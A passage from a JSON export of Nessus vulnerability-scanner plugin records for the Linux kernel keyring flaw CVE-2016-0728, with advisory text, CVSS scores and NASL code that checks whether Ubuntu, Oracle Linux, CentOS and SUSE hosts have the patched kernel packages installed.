preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1020-raspi2\", pkgver:\"4.2.0-1020.27\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:50:56", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.2.5.el7uek]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) \n[Orabug: 22563965] {CVE-2016-0728}", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-21T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-21T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3509.NASL", "href": "https://www.tenable.com/plugins/nessus/88032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3509.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88032);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.2.5.el7uek]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) \n[Orabug: 22563965] {CVE-2016-0728}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-January/005703.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-January/005704.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3509\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.2.5.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.2.5.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.2.5.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.2.5.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2871-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2871-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88013);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2871-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2871-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2871-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic-lpae\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-lowlatency\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:30", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-26T00:00:00", "title": "CentOS 7 : kernel (CESA-2016:0064)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88148", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064 and \n# CentOS Errata and Security Advisory 2016:0064 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88148);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2016:0064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-January/021625.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5252ffe4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:27", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a\nsecurity fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, 